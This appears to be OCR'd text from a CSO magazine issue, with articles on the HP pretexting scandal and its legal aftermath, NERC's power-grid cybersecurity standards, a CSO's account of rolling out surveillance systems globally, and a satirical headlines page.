Investigators had analyzed 10,000 news articles about HP published over a six-year time frame and indexed 1,000 articles written by the CNET reporter, Dawn Kawamoto. They had reviewed all the documentation that the board of directors had generated and relied upon for the meeting, as well as information about the meeting that was available publicly or to other HP employees. They had conducted extensive searches of HP’s e-mail and Internet servers, and interviewed employees and board members in grueling detail about specific information that had been leaked to CNET and other publications over the years.

By page 13 of the memo, the case seemed pretty well sealed up. Investigators picked apart the language and facts for which Kawamoto cited an unnamed HP source, with the pool of possible sources dwindling down to one. In 2002, the “source” knew details about a licensing agreement with Intel in 1993; only two current board members would know those details. In 2003, the “source” spoke in glowing terms of HP’s portfolio of patents; this was a favorite talking point of one board member. In 2006, the “source” used the term lectures, “an academic term, rarely used in the business environment”; only one board member had an academic background. In 2001, one board member had cultivated a relationship with Kawamoto, at former CEO Carly Fiorina’s request, to promote HP’s merger with Compaq. And so it went. In each instance, that board member was George W. Keyworth II.

The evidence was largely circumstantial, but this wasn’t a criminal case. This was an internal investigation meant to help chairwoman Dunn and CEO Mark Hurd plug the leaks.

The trouble began when investigators sought to put the final nails in Keyworth’s coffin. “...[A]t 5:25 p.m. PST on January 18, 2006...a call was made from Kawamoto’s cell phone to Keyworth’s home in Piedmont, California,” reads a sentence on page 13. “The call lasted approximately one minute.”

There began a litany of details from private phone records that no scrupulous investigator would have been able to obtain without help from law enforcement. The 12 pages of material that would make any investigators stand tall were actually embedded in an 18-page document that also spoke of things more likely to make them slouch in their seats—covert intelligence gathering, video surveillance and “third-party phone information.”

Yet it was an effective campaign. By page 17, Keyworth had admitted to investigators and the board that he was the source, explaining, in investigators’ words, that “he thought it was in the best interests of HP for the information in the January 23 article to be made public.” Keyworth would soon resign.

What followed is painfully well-known. Felony charges from the California Attorney General against five people who allegedly were involved with accessing private phone records under false pretenses. Several resignations, including Hunsaker, Dunn and Anthony Gentilucci, manager of global security investigations. Congressional hearings where some HP executives pleaded the Fifth Amendment and some lawmakers compared the scenario to Enron and Watergate. Salacious details of how investigators trailed a board member from California to Colorado, used e-mail tracing technology unknown outside of the marketing and investigations worlds, and even considered planting spies in newsrooms. Hurd’s very public apology. A $14.5 million settlement HP reached with California to resolve civil claims in the case. (HP refused to comment for this story.)

The HP investigation was expensive, invasive, out of scale with the problem and largely unnecessary. In short, it is probably the stupidest thing HP has ever done. And that’s exactly why, despite what some may hope, it is unlikely to have a lasting impact on how corporations run investigations.

To those who say that HP will change everything, we say, yeah right. Instead, we proffer five things that the HP investigation won’t change—at least, not in the way one might expect.


Legislation Snapshot

A look at new and pending antipretexting laws

Is pretexting to obtain telephone records illegal? In California, Attorney General Bill Lockyer thinks so. He has filed felony charges against five individuals involved with the Hewlett-Packard investigation who allegedly obtained private telephone records under false pretenses. The complaint, filed in October, charges each of the defendants with four felony counts, including fraudulent wire communications, the wrongful use of computer data and identity theft.

Nevertheless, many legislators—including state senators in California—see the need for more clarity when it comes to who can access telephone records, and when. The following is a sampling of new and proposed antipretexting legislation.


LAW: California S.B. 202, Amendment to the penal code related to privacy
STATUS: Signed by governor on Sept. 29, 2006
WHAT IT WOULD DO: Makes it a crime to purchase or sell, or conspire to purchase or sell, phone records without the subscriber’s written consent.

LAW: Illinois S.B. 2554, Amendment to the Identity Theft Law of 1961
STATUS: Took effect July 5, 2006
WHAT IT WOULD DO: Prohibits the use of personal information to gain access to any record of actions, communications, or other activities or transactions of a person, without prior permission from that person.

LAW: New York S. 6723, Consumer Communication Records Privacy Act
STATUS: Took effect Sept. 26, 2006
WHAT IT WOULD DO: Prohibits the procurement, sale or use of telephone record information without the authorization of the consumer. Exceptions: cases where other parties have a legitimate interest in such information, such as law enforcement agencies prosecuting crimes.

LAW: U.S. H.R. 4709, Telephone Records and Privacy Protection Act of 2006
STATUS: Passed House on April 25, 2006. Passed Senate on Dec. 8, 2006. Bill was awaiting President Bush’s signature at press time.
WHAT IT WOULD DO: Establishes criminal penalties for obtaining, or attempting to obtain, confidential phone records under false pretenses, or accessing customer accounts via the Internet without prior customer authorization. H.R. 4709 was one of several competing bills introduced in Congress in early 2006. Unlike other bills, H.R. 4709 includes a controversial exemption for law enforcement agencies. It also does not describe steps phone companies should take to protect customer records.
ASSUMPTION #1 This is a wake-up call to corporate America about the risks of botched investigations.

AS THE scandal unfolded, Bill Wipprecht, CSO of Wells Fargo in San Francisco, worked on some elevator “talking points.”

In between floors 1 and 12, he says, “When other executives say, ‘What do you think of that?’ you have to be able to respond instead of just fumbling for your keys.”

For his part, Wipprecht likes to say that because the media benefits from leaks, journalists didn’t focus on what Keyworth did wrong. He also asserts that because Wells Fargo is in a highly regulated industry, his investigations group doesn’t take any chances by using risky techniques that wouldn’t, as he puts it, play well on the evening news. “We’re already overregulated, and we think we’re knowledgeable about all the laws,” says Wipprecht, whose group typically investigates things such as cash shortages, mortgage fraud and expense abuse.

Likewise, the senior director of loss prevention at Luxottica Retail, who’s a member of the ASIS Retail Loss Prevention Council, insisted that he hadn’t experienced any extra scrutiny on the investigations his group runs, which are typically background checks on new employees or investigations into thefts from stores.

“I have no intention of scaling back, because I know our investigations are done under guidelines and the law,” says Alan Greggo, whose company operates 4,600 retail locations including LensCrafters, Pearl Vision and Sunglass Hut. Checks and balances are key, he says. Any use of the company’s camera system, for instance, must be approved by a senior director and the legal department; results of investigations must be reviewed by a director-level loss prevention associate to make sure evidence is used properly.

Elsewhere, CSOs were looking at their policies and largely concluding that they had appropriate guidelines in place. Recruiter Kathy Lavinder, executive director of Security and Investigative Placement Consultants in Bethesda, Md., says some of her clients were dusting off their policies, pushing them out to their chains of command, and emphasizing that certain tactics—such as pretexting to obtain private telephone records—were not allowed. She adds that no one she talked to had indicated they ever permitted such activities. But she didn’t seem convinced that the HP investigation would necessarily result in any seismic changes.

“I think there’ll be a lot of talk,” Lavinder predicts. “In some cases it will be genuine, and in some cases it will be window dressing. A certain number of senior executives want to do what they’ve always done, which is to some extent turn a blind eye, particularly if an investigation is outsourced. Don’t ask, don’t tell. That’s a risky strategy, but I think we’ll see some of that as well.”

What makes this easy to do, given the circumstances, is that the HP case appears to be an outlier—something so outlandishly awful that the industry can shrug its collective shoulders and simply disregard it. Companies can say, “It won’t happen to us,” because it probably won’t. Furthermore, if people with lots of money and power are committed to a project that constitutes an epic lapse in judgment, it’s very difficult to stop them. Sad, but true.

Reality check: For better or worse, HP is a talking point, not an industry-changing event.

ASSUMPTION  #2  Companies  will  quit 
exposing  themselves  to  the  risks  of  third- 
party  investigators,  who  themselves  may 
outsource  some  investigations  work. 

IF  THE  execution  of  the  HP  investigation  was  an  outlier,  it 
was  also  an  extremely  unusual  operation  from  the  get-go.  After 
all,  an  investigation  involving  board  members  is  not  an  every¬ 
day  job  even  for  the  most  seasoned  internal  fraud  examiner  or 
loss  prevention  specialist.  In  fact,  it’s  the  very  kind  of  special¬ 
ized  task  that  probably  ought  to  be  outsourced. 

“Third-party  investigators  are  an  important  part  of  the 
process  that  corporate  America  and  retailers  use,”  says  Joe 
LaRocca,  VP  of  loss  prevention  for  the  National  Retail  Federa¬ 
tion,  a  lobbying  group  in  Washington,  D.C.  If  you  want  to  find 
out  if  a  potential  hire  has  a  criminal  history,  for  instance,  you 
might  hire  a  firm  with  expertise  in  researching  public  records. 
“You’re  going  to  go  to  a  third  party  because  they’re  the  experts 
in  getting  the  information.” 

“I  don’t  think  of  it  as  outsourcing,”  says  Regis  Becker,  director 
of  global  security  and  compliance  at  PPG  Industries,  the  Pitts¬ 
burgh-based  industrial  manufacturer.  “We  use  what  we  call 
‘stringers’”— highly  competent  retired  agents  from  the  military, 
FBI  and  Secret  Service  who  set  up  small  investigative  shops. 
“They  have  the  training,  they  understand  the  law  and  they  don’t 
have  to  be  briefed  on  every  detail.  Everybody  is  working  from 
the  same  page.” 

Most  often,  this  large  stable  of  seasoned  investigators  avail¬ 
able  for  contract  work  makes  the  use  of  third-party  investiga¬ 
tors  simply  a  good  business  practice. 

If  HP  had  had  only  its  internal  investigators  working  the 
case,  rather  than  turning  to  third  parties,  people  would  be 
questioning  that  decision,  too. 

“A  good  outside  law  firm  would  say,  Why  do  you  have  your 
loss-prevention  and  anti-piracy  guys  doing  this?  What  do  they 
know  about  it?”  says  David  Caruso,  founder  of  the  Dominion 
Advisory  Group,  who  was  brought  in  as  executive  vice  president 
of  compliance  and  security  at  Riggs  Bank  after  the  Au gusto 
Pinochet  money  laundering  scandal  in  2003. 

Of  course,  people  in  the  security  world  have  always  known 
that  sometimes  this  method  is  used  to  keep  less  savory  inves¬ 
tigative  techniques  at  arm’s  length.  Just  think  back  to  the  infa- 
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Investigations 


mous  P&G  Dumpster  diving  case  in  2001.  The  consumer  goods 
company  paid  Unilever  $10  million  after  being  caught  hiring  a 
competitive  intelligence  firm  to  conduct  an  investigation  that 
involved  going  through  its  rival’s  trash. 

It’s  up  to  CSOs  to  make  sure  that  their  companies  choose 
firms  carefully  and  monitor  them  well.  “If  you  have  to  hire  a  con¬ 
tractor  to  run  investigations,”  Caruso  warns,  “you  have  to  actively 
manage  what  you’re  doing.”  But  that’s  nothing  new,  either. 

Reality  check:  Companies  should  monitor  their  third-party 
investigators,  but  it  would  take  a  lot  more  than  HP’s  black  eye 
to  make  them  move  investigations  in-house. 

ASSUMPTION #3 Congress will pass an antipretexting law because of the revelation that HP investigators obtained phone records using false identities.

“ARE YOU familiar with the term ‘pretexting?’” Rep. Joe Barton (R-Texas) asked one of the witnesses who had been called to testify before a House Energy and Commerce subcommittee, not about the HP investigation but about consumer privacy. “There are companies now,” he continued, “that are in existence to proactively invade your privacy and sell the results of their ill-gotten gains to anybody with 100 bucks.”

Rep. Barton should know. After extensive hearings on pretexting, he and 29 cosponsors—both Republican and Democrat—already had introduced legislation, H.R. 4943, to “prohibit fraudulent access to telephone records.” The bill had passed Barton’s committee unanimously. Several competing pretexting bills had been introduced. A bipartisan Senate bill, S. 2178, would “make the stealing and selling of telephone records a criminal offense.” Another House bill, H.R. 4709, set criminal penalties for obtaining phone records under false pretenses.

The date of this particular hearing at which Barton brought up pretexting was June 20, 2006—a full three months before HP executives would again find themselves on the stand at another hearing that involved telephone pretexting. Rep. Barton had introduced his legislation back in March 2006; competing bills were introduced even earlier, and H.R. 4709 won unanimous House approval in April 2006.

Although he wasn’t questioned about pretexting, Scott Taylor, the chief privacy officer of HP, spoke that day of his company’s commitment to protecting the personal information it collects about customers. “[P]rivacy is actually a core value at HP,” he said.

The HP investigation scandal brought new awareness to pretexting for telephone records, but the fact is that Congress was already well aware of the practice and was taking steps to criminalize it. Indeed, as far back as 2000, a committee had investigated why pretexting—yes, they used that exact word—for personal banking records was still proving successful despite the passage of privacy provisions in the Gramm-Leach-Bliley Act.

The federal telephone pretexting bills stalled, however, and even the HP hearings in September didn’t budge them. It wasn’t until after the elections, on Dec. 8, 2006, that the Senate passed H.R. 4709, advancing the bill to the White House.

What HP did make clear was that everyone agrees on the need for a federal law clarifying who can and cannot access phone records. Enforcing it will be another story.

Reality check: Federal law protecting the privacy of customer phone records is likely, but it was already in the works.

ASSUMPTION #4 Investigators will stop using telephone call records to build cases.

LET’S BE clear here. Telephone records are a routine part of investigations, and no single law is going to change that.

Company phone records, for instance, are routinely used for internal investigations, and no one blinks an eye. Employees simply don’t have a reasonable expectation of privacy about calls they make and receive on company phone systems.

Likewise, phone records are also routinely used for investigations done by law enforcement, especially after the passage of the USA Patriot Act. Sometimes records are obtained with subpoenas; other times they’re released as a courtesy. Large telecommunications companies even have staffs in charge of responding to these requests for telephone and ISP records.

A law protecting private phone records would make it more difficult to obtain records outside of those two circumstances. But no one thinks it will stop the practice. It’ll just change how individuals weigh the risks and possible rewards of accessing such records.

“I think the HP case will turn people away from phone records, but in a cheating spouse situation or with a business partner gone bad, I think people are going to take that upon themselves to hunt around for that information,” the National Retail Federation’s LaRocca says.

“There are always people out there who can get you any kind of information, anytime, anywhere, and if you hire those people they’ll get it for you,” Wells Fargo’s Wipprecht says. “The question is, do you really want to know?”

Reality check: There are legitimate ways to obtain private phone records, and the illegitimate ways won’t disappear overnight.


ASSUMPTION #5 Companies will hire law firms, not investigations firms, so that investigations are done by the book.

INVESTIGATIVE FIRMS aren’t the only ones hired to do investigations. There’s a booming business right now for law firms that do investigations—and that’s not going to change.

“A lot of investigations that would have been handed out to a small investigative boutique will instead go to a reputable law firm,” predicts Lavinder of Security and Investigative Placement Consultants, noting that this is a trend she’s been observing for a while.

These are firms such as the New York City-based Debevoise & Plimpton, which did an internal investigation into whether Merck executives knew about dangers of the arthritis drug Vioxx; and WilmerHale, the firm based in Washington, D.C., that was recently in the news for its investigation into how stock options were granted at UnitedHealth. Firms like these use different methods than investigations firms.

“We have a lot of clients who turn to us to do investigations, but they’re not going to go out and find somebody’s phone records,” says one attorney who works on white-collar investigations for a large law firm, who spoke on condition that he not be identified. “Normally, the heart of the internal investigation work we do is, the company is giving you access to e-mail systems and documents and access to employees as well, usually who are required to cooperate with you on the pain of being fired if they don’t.”

By their very nature, law firms collect evidence to be used in court. Investigations firms, on the other hand, may want information merely to put them on the right trail, whether it’s permissible as evidence or not. Either way, though, there’s a huge gray area of things that can be done legally but are widely considered unethical—and neither group has the monopoly on ethics. “Being an attorney makes you no more ethical than anybody else in the investigations business,” Wipprecht quips.

There is one big difference, however. Investigations done by law firms are decidedly more expensive than ones done by investigative firms. Debevoise & Plimpton’s investigation into Vioxx reportedly took 20 months and cost $21 million. If companies do turn increasingly to law firms, it will be because they have other ways to justify the cost.

And what would that be? “Law firms have always been used principally to make sure the information gathered is covered by attorney-client privilege,” Becker says.

It’s not a foolproof strategy, though. That HP memo we recounted earlier? Each and every page of it carried a stern warning: “Attorney-Client Privileged.”

Reality check: Investigations done by law firms are too expensive to justify just for the investigation’s sake. ■

Reach Senior Editor Sarah D. Scalet at sscalet@cxo.com.
IN THIS STORY
How cybersecurity standards affect physical assets
Details on the standards

IT TOOK FOUR YEARS, twice as long as Larry Bugh thought it would, but the nation now has a proposed set of standards designed to help protect the North American power grid from cyberattack. These standards, dubbed critical infrastructure protection Permanent Cyber Security Standards and released by the North American Electric Reliability Council (NERC) in May, represent what appears to be the first set of security standards to address every aspect of cybersecurity, including operation, management and even the physical safety of cyberassets.

The Federal Energy Regulatory Commission (FERC) is poised to adopt these standards, which have the potential to be seen as a model by players in other industries that make up the nation’s critical infrastructure.

Bugh is a leading player in the standards effort. He is CSO at ReliabilityFirst, one of the eight U.S. reliability councils that monitor and enforce good reliability practices in the power industry. He chaired the 25-member NERC standards draft team, which was formed in early 2003. The federal government asked the team to discuss how electric providers should respond to industry trends that showed a growing number of electrical utilities connecting their control systems to their computer networks.

Those powerful network links led to some real disconnects between professionals with different areas of expertise. Bugh says that executives at many utilities were unfamiliar with the idea of having to protect control systems from cyberattack since, in the past, control systems have typically been kept separate from other systems. But as technology has evolved and the power industry has looked for operational efficiencies, control systems have become more connected to computer systems and the Internet, and are therefore exposed to emerging computer security threats. (See “Out of Control,” www.csoonline.com/read/080104.)

Meanwhile, computer security experts had trouble adapting to the idea that any cybersecurity protections needed to be implemented in ways that did not so much as slow down the control systems.

So NERC, whose 7,500 members comprise most of the electric sector entities (including cooperatives, government and investor-owned) in the United States and Canada, as well as those in Baja, Mexico, set up the draft team to devise the original standards in August 2001.

“We knew we were breaking new ground, and we knew it would be controversial,” Bugh says of the effort and its intended product. Even still, he figured it would take only a couple of years to work things out. But a first draft that generated 900 pages of comments from NERC members was a sign of how much work was ahead.

Standards with Muscle

The new critical infrastructure protection (CIP) standards stand out both for their breadth and their teeth—once FERC approves the CIP standards, both the industry group and the government will have the power to fine member utilities that don’t comply with them.

The standards are broad, affecting everything from the hiring process for people who will be responsible for cybersecurity (including background checks), to guidelines for perimeter security responsibility and controls. They cover, among other things, training standards, management systems, electronic security, physical security, and incident reporting and response.

NERC officials are careful to note that the new infrastructure standards cover only cybersecurity—the physical aspects of the standard relate specifically to physically securing cyberassets, not, say, power transmission lines or turbine generators. Still, the effort will mean that any piece of information technology whose vulnerability could affect a control system’s operation—whether it be a computer system, backup system, network equipment or software—needs to be protected.

That risk coverage is a noteworthy step, says Dale Peterson, director of the consulting practice at Digital Bond, a company that consults on supervisory control and data acquisition, or SCADA, systems for a variety of industries, including electric power generators. Peterson has blogged extensively (at www.digitalbond.com) about the NERC standards as they have been developed. “There are no other standards in the cybersecurity space that say ‘you must do this,’ and have a measurement component and have an audit plan,” he says.

Peterson says this represents a significant shift from the guideline documents common to this industry, which have loose recommendations. “These say ‘must’ or ‘shall.’ These standards can be audited, and you can say if it’s compliant or noncompliant,” he says.

Mission Critical

The North American Electric Reliability Council’s new cybersecurity standards for critical infrastructure protection have eight categories, which apply utility risk management analyses to networked systems. A thumbnail description of the main areas:

Critical Cyberassets Defines critical cyberassets involved in power generation, such as control center assets, transmission substations, backup generators, protection systems and equipment involved in restoring power supplies. Such assets could include monitoring and control systems, automatic generation controls, real-time power system modeling tools, real-time interutility data exchanges and network communication protocols.

Security Management Controls Establishes requirements for formal cybersecurity policies, such as identifying a lead security manager and reporting on changes and exceptions in security controls.

Personnel and Training Requires at least one cybersecurity training exercise per quarter, plus annual training. Also requires preemployment background checks.

Electronic Security Requires establishing a security perimeter (including access controls) and performing cybervulnerability assessments and securing cyberassets. Includes monitoring network traffic, intrusion detection and data retention.

Physical Security Establishes plan for protecting physical equipment needed for cybersecurity. Includes guidelines for housing such equipment behind walls and monitoring physical access to systems, with provisions for escorts, alarms and video surveillance.

Systems Security Management Establishes rules for how to securely manage and monitor information systems and test procedures for vulnerability assessments. Sets up provisions for what constitutes a significant systems change, such as implementing patches, new versions of software, service packs, and new custom or third-party applications.

Incident Reporting and Response Planning Sets up a computer incident response team as a requirement. Mandates that all incidents be reported to the Electricity Sector ISAC (information sharing and analysis center).

Recovery Plan Establishes disaster recovery plan, annually reviewed. Details the severity and types of attacks that would trigger a recovery effort and what that effort should consist of, and requires defining the roles and responsibilities of those who will respond. -M.F.
Covering Digital and Physical Ground

The new critical infrastructure protection Permanent Cyber Security Standards replaced an earlier version developed in the wake of the September 11 attacks. That version, called the Urgent Action Cyber Security Standard (also known as CIP 1200), was approved the day before the August 2003 blackout and was considered a temporary measure.

The NERC group working on the new critical infrastructure protection standards used CIP 1200 as a jumping-off point, but the new standards are far broader, with eight categories covering the gamut of physical, operational and cybersecurity challenges. Among other things, the standards would require: background checks of potential employees, access authorization on both the physical and systems side of a utility, and establishment of a full-scale disaster response and restoration plan for both cyber and physical incidents. (See “Mission Critical,” opposite page.)

Peterson says that electricity providers will be able to read the standards and understand how to build a complete security program. NERC also has organized seminars where people like Bugh talk through the standards with power industry managers.

The standards themselves still face some politicking. The NERC board approved them and considers them in effect for its members as of June 1, 2006. But NERC only submitted the standards to FERC in August, and the federal agency has no deadline for adopting these standards as government policy. NERC also is negotiating with other parties in the North American grid, including the provinces and other regulatory bodies in Canada and the Mexican state of Baja. Thus far, the province of Ontario has signed a memorandum of understanding to adopt the NERC cybersecurity standards.

FERC will release a Notice of Proposed Rule Making and allow for public comments on the standards. It may not give them a rubber stamp, though: NERC submitted 102 standards to FERC for approval in its initial application to become the nation’s first Electric Reliability Organization, an entity created by the Energy Policy Act of 2005. FERC has reviewed that list but remanded 20 of the proposed standards to NERC with specific comments about what needs to be done for it to approve them. While FERC could send back some or all of the new CIP standards, Stan Johnson, a manager of situation awareness and infrastructure security at NERC, says he expects the standards to be approved by June.

Members of NERC’s drafting team say they tried to make up for the lack of hands-on examples contained in the standards by creating a three-point framework. “We had to consider three things: the [potential cybersecurity] threat, the consequence of an event and the vulnerability,” says George Miserendino, president of Triton Security Solutions. Miserendino was on the CIP cybersecurity drafting team, representing Edison Electrical Institute.

The huge blackout of Aug. 14, 2003, in which a software glitch at a single electrical provider in Ohio cascaded into an event in which 50 million people in North America lost power, underscored the importance of the reliability standards discussion. But Miserendino says that the group’s biggest motivator was the threat that FERC might come in and do the regulating for it. In part, he says, that’s because the 2005 Energy Act made FERC responsible for electrical transmission reliability and gave the federal agency the ability to fine utilities for noncompliance.

Even with the threat of government regulation, Miserendino says, gaining consensus within NERC on self-regulation took almost three years. “The difficult thing was convincing people this was the first step in an evolution and not an end unto itself,” he says.

The standards have room to evolve. While more than 88 percent of NERC’s members voted to approve them—approval required two-thirds—there were still some “no” votes cast. NERC noted objections when it announced the critical infrastructure protection standards: implementation costs, combined with the potential for little or no return on that spending; requirements that went beyond critical cyberassets at bulk power system control centers; and some ambiguous asset definitions. FERC may ask for clarification on any of these issues. FERC might also balk at the industry being its own auditor. But no one expects wholesale rejection by FERC.

What remains unclear is whether the standards will have any impact on other elements of U.S. critical infrastructure, such as the chemical, water, or oil and gas industries. “I’ve told my friends in chemical and oil and gas that they could take those NERC standards, change the definition of what a cybersecurity asset is and use them as they are,” says Peterson. He suspects that won’t happen, in part because of industry politics and in part for regulatory reasons—FERC has both a measuring stick to gauge compliance and a rod to punish failures. Other industries have fewer cybersecurity rules.

Johnson from NERC says that his organization has had only generic talks about cybersecurity with the chemical industry. But its CIP standards have caught the attention of the nuclear power industry and the water sector, both of which are interested in how the standards came about. It may be that Bugh and his drafting team have created a landmark in cybersecurity that will ripple beyond the electric power industry. ■

Michael Fitzgerald is a freelance writer based near Boston. Send comments to csoletters@cxo.com.
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Eyes  on  the  World 

The  need  to  standardize  our  surveillance  systems 
seemed  obvious— until  we  had  to  sell  the  idea 
globally  By  Anonymous 

REMEMBER  FONDLY  MY  first  surveillance  system.  A  small, 
relatively  inexpensive  VHS-based  system  for  one  retail  location,  it 
consisted  of  a  few  pan-tilt-zoom  and  stationary  cameras.  As  the  store’s 
loss  prevention  manager,  I  was  responsible  for  ensuring  the  quality  of 
the  images  by  adjusting  the  recording  levels,  cleaning  the  recorders 
and  maintaining  new  tapes  for  the  VCRs.  All  in  all,  the  system  worked  well, 
and  it  helped  us  reduce  employee-related  losses  and  shoplifting. 

Twenty  years  later,  I’m  the  CSO  of  a  global  retailer  whose  business  model 
requires  intense  surveillance,  and  things  are  considerably  more  complicated. 
When  I  was  hired,  the  surveillance  system  desperately  needed  to  be  modern¬ 
ized.  There  were  too  many  different  systems  from  too  many  vendors,  and  the 
quality  went  from  bad  to  worse. 

Image  quality  was  rarely  good 
enough  to  support  a  finding. 

Coverage  was  simplistic,  pro¬ 
viding  more  opportunity  than 
deterrence.  And  the  systems 
required  too  much  local  support 
to  keep  tapes  fresh  and  libraries 
current.  The  company  needed 
a  strategic,  long-term  approach 
to  move  away  from  VHS-type 
systems. 

How  hard  could  that  be? 

Harder  than  I’d  thought.  As  it 
turns  out,  decisions  about  sur¬ 
veillance  systems  need  a  lot 
more  companywide  involvement, 
communication,  business  acu¬ 
men  and  cultural  sensitivity  than 
I  ever  imagined  back  when  I  was 
working  on  those  early  cameras. 

Time  for  Standards 

My  group  and  I  got  started  by 
creating  a  standard  for  video  surveillance  based  on  both  performance  and 
operational  drivers  within  our  U.S.  business  environment.  We  decided  that 
the  systems  needed  to  be  digitally  based  with  hard-drive  storage  so  that  all 
cameras  recorded  continuously.  Recording  would  have  a  minimum  image- 
per-second  frame  rate  and  video  resolution.  In  addition,  the  systems  needed 
to  be  network-friendly,  to  allow  for  remote  access  to  live  and  recorded  video, 
remote  serviceability  and  remote  monitoring  for  equipment  failure  or  other 
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alarm  conditions.  Finally,  the  systems  had  to  require 
little  to  no  local  intervention. 

We  did  a  full  analysis  of  systems  and  providers  and 
identified  the  most  cost-efficient  system  with  the  best 
capabilities  and  long-term  flexibility.  We  chose  one 
provider  for  our  surveillance  product  and  one  integra¬ 
tor  who  would  be  responsible  for  installation  into  our 
physical  security  network. 

We  presented  the  new  platform  to  the  company’s 
U.S.  senior  managers,  making  a  case  that  costs  would 
be  offset  by  reduced  maintenance,  service  and  train¬ 
ing  costs,  as  well  as  improved  performance,  speed  and 
quality  of  the  new  digital  system.  Senior  management 
determined  that  it  was  a  solid  strategic  investment  for 
the  company. 

We  established  a  plan  to  roll  out  all  the  surveillance 
systems  across  the  United  States  within  five  years. 
Rather  than  paying  for  everything  up  front,  we  agreed 
to  a  strategy  of  upgrading  as  the  company  opened  new 
locations  and  renovated  existing  locations,  as  well  as 
through  annual  capital  requests  allocated  to  the  secu¬ 
rity  department.  Basically, 
if  we  planned  to  remodel 
a  location  within  five  years, 
we  could  build  the  new  sys¬ 
tem  into  the  remodeling 
costs.  Otherwise,  we  used 
security  capital. 

Not  only  was  the  U.S. 
transition  a  great  achieve¬ 
ment,  we  also  had  success 
in  introducing  the  new 
platform  in  some  of  our 
international  locations 
that  were  newly  opened 
or  undergoing  significant 
renovation.  Because  of  this 
success,  security  decided  to 
extend  the  new  platform  to 
all  our  international  divi¬ 
sions.  This  wasn’t  without 
precedent;  the  company 
had  standardized  many  of 
the  information  technol¬ 
ogy  systems.  Therefore, 
we  assumed  that  the  acceptance  by  U.S.  management 
guaranteed  it  internationally. 

Going  Global 

As  we  had  in  the  United  States,  we  decided  to  upgrade 
all  the  systems  within  five  years.  Again,  this  was  to 
be  accomplished  through  the  opening  of  new  loca- 
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tions,  renovations  and  department  capital 
spending.  However,  as  soon  as  we  began 
planning  the  improvements,  international 
management  began  to  push  back. 

First,  the  managing  directors  of  our 
international  markets  expressed  disap¬ 
pointment  that  they  had  not  been  involved 
with  the  decision-making  process.  This 
was  especially  important  in  light  of  a  dif¬ 
ference  between  how  domestic  and  inter¬ 
national  divisions  handle  their  finances. 
In  the  United  States,  managing  directors 
were  responsible  for  sales  targets  and 
expense  plans,  but  they  were  not  allowed 
to  adjust  their  expenditures  to  drive 
additional  sales  and  earnings.  Interna¬ 
tional  managing  directors,  however,  were 
directly  responsible  for  growing  their 
topline  revenue.  They  could  adjust  their 
expenditures  significantly— provided  that 
they  drove  additional  sales  and  earnings. 
Now,  they  questioned  the  ROI  of  the 
new  surveillance  systems,  especially  in 
markets  that  had  much  lower  crime  and 
a  less  valuable  inventory  allocation  than 
our  locations  in  the  United  States.  For  the 
most  part,  they  agreed  that  the  systems 
needed  to  be  upgraded,  but  they  felt  that 
any  DVR  system  would  be  fine. 

I  remember  vividly  a  conversation  with 
one  of  our  international  vice  presidents, 
who  indicated  that  he  didn’t  want  to 
spend  that  kind  of  money  on  “just  a  cam¬ 
era  system.”  He  had  other  capital  priorities 
where  he  thought  his  money  should  be 
allocated.  His  money?  I  thought  it  was  our 
money.  We  were  so  familiar  with  the  U.S. 
model  that  we  missed  the  point  that  inter¬ 
national  divisions  had  more  of  a  financial 
interest  than  their  U.S.  counterparts. 

They  also  argued  that  they  could  pur¬ 
chase  the  technologies  and  components 
less  expensively  from  local  markets.  They 
said  they  couldn’t  justify  the  costs  associ¬ 
ated  with  the  foreign  systems. 

I hadn't expected this type of opposition. I had believed that there would be some minor opposition, but I never anticipated being challenged on the quality of our standard; we're the experts, after all. But it did lead to a healthy dialogue, and now we're considering our options.


A  Different  Approach 

One of our main mistakes was underestimating the need to market the benefits of the surveillance system to international management. Now, we're trying to highlight examples that demonstrate its ROI. When international management visits the United States, we give them a tour of the global security center to show how we will be able to pull video from any site upon request, normally a time-consuming process for store managers. We'll also focus on the fact that the global security center can monitor all surveillance systems worldwide to ensure that the systems are functioning properly, which will take some burden off the stores.

If that doesn't work, one option we're considering is scaling the standard investment against risk. For instance, a higher-risk operation, such as a standalone store, would have to meet a higher standard than a lower-risk location, such as a store within a mall. The overall design of the system might be a compromise in size, price and capability, as long as it maintains a few of the critical performance and operational drivers.

Another option is a more culturally sensitive approach. In this scenario, we would wholly maintain the standard. However, the investment would be broken down into components, and we would allow local management and security to identify components that could be sourced less expensively using local manufacturing and expertise. This approach is more likely in the Asia-Pacific region, where electronics manufacturing is concentrated and local allegiances are strong. The option has some risks, especially those associated with assembling a surveillance system with components from multiple sources. Also, critical components will need to be provided by our primary vendor, so it's not clear how much money this would actually save. Nonetheless, it could engender good feelings with local management and staff.

Lastly, we have the option to mandate compliance despite international management's objections. We could make a strong case to executive management that it doesn't matter how local managers feel, because the surveillance platform is part of a broader strategic investment. This is a last resort, however, because it would probably lead to further alienation and to the deterioration of security's partnership with international management.

In the end, I believe that our commitment to communicate the value of the standard will enable us to migrate our full platform successfully in at least 90 percent of our international markets. For the other 10 percent, I fear it will be an endless "lost in translation" issue requiring security to compromise in favor of a locally sourced option.

It's been a long time since I did that simple one-store surveillance installation. The dynamics of expanding surveillance to a strategic investment at a global organization are inherently complex. We must carefully research, market and communicate in order to establish a standard that fits globally. We need a thorough business case that explores the financial implications to all aspects of the organization. I now appreciate that a true strategic companywide investment should be vetted through all business channels prior to implementation in the United States. This is the mark of a security organization that is truly global. ■

Undercover is written by a real CSO. Send comments to csoundercover@cxo.com.
2007 Headlines (satirical illustration)

Second Life Hires CSO
Avatars claim security "virtually nonexistent"

Statue of Liberty Stolen
High copper prices make Lady Liberty worth $10 million at scrapyards

Flaw Discovered in Windows Vista!

Government approves wiretapping of all restaurant, bar conversations
Move necessary because "idle chitchat provides perfect cover for terrorist plotting," Feds say

Mona Lisa Missing!
Tom Hanks meets Audrey Tautou in Paris to investigate

President's Identity Stolen
... credit card statement

Flight Delayed 12 Hours by Perrier
"There was a shady-looking guy drinking fizzy liquid," says another passenger on Toledo-to-Appleton flight

ILLUSTRATION BY JIM HAYNES